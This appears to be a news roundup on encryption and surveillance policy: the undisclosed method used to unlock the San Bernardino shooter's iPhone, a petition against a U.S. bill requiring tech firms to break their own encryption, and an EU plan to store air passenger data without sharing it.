The strange tale of the San Bernardino iPhone seems like it’s almost over, although it touched off a national debate about encryption that’s just getting started. Apple probably won’t find out what method was used by the third-party firm that broke into the iPhone 5c used by shooter Syed Rizwan Farook, reports Reuters.

The government says that the unidentified international firm that did the hack has legal ownership of the method, so while the FBI got the data it wanted, it’s unable to disclose the method to Apple. There’s actually a system in place, known as the Vulnerabilities Equities Process, that’s designed to evaluate flaws discovered by the government’s own agencies to determine if they should be disclosed to the technology companies who can patch them, or if the vulnerabilities can remain secret to be used by the NSA, FBI, or other agencies.



More than 43,000 sign petition against U.S. encryption-breaking bill

More than 43,000 people have signed a petition against proposed U.S. legislation that would require tech companies to break into their users’ encrypted data when ordered to by a judge.

The proposal, from Senators Richard Burr and Dianne Feinstein, would require smartphone OS developers and other tech vendors to assist law enforcement agencies by breaking their own security measures.

CREDO Action, a progressive activist group, launched a petition opposing the Compliance with Court Orders Act on Tuesday, and more than 43,000 people had signed it by early Thursday afternoon.



EU plan to collect, not share, air traveler data is ‘absurd’

Air passengers entering or leaving the European Union will have their movements kept on file by police authorities from 2018 under draft legislation approved by the European Parliament.
Critics, however, say a lack of provisions to share the data severely limits the plan’s usefulness.
Airlines running flights into or out of the EU must hand over the data to national Passenger Information Units (PIUs) that will hold the data for law enforcers. Member states may choose to gather data from travel agencies and to retain information about passengers on flights within the EU too.
However, there will be no centralized EU database of arriving and departing passengers, and no automatic sharing of data between the various national PIUs. With open land borders between countries in the Schengen Area, and no mandatory collection of information on intra-EU flights, it will be difficult for investigators to use the data to determine whether a person of interest is in the EU.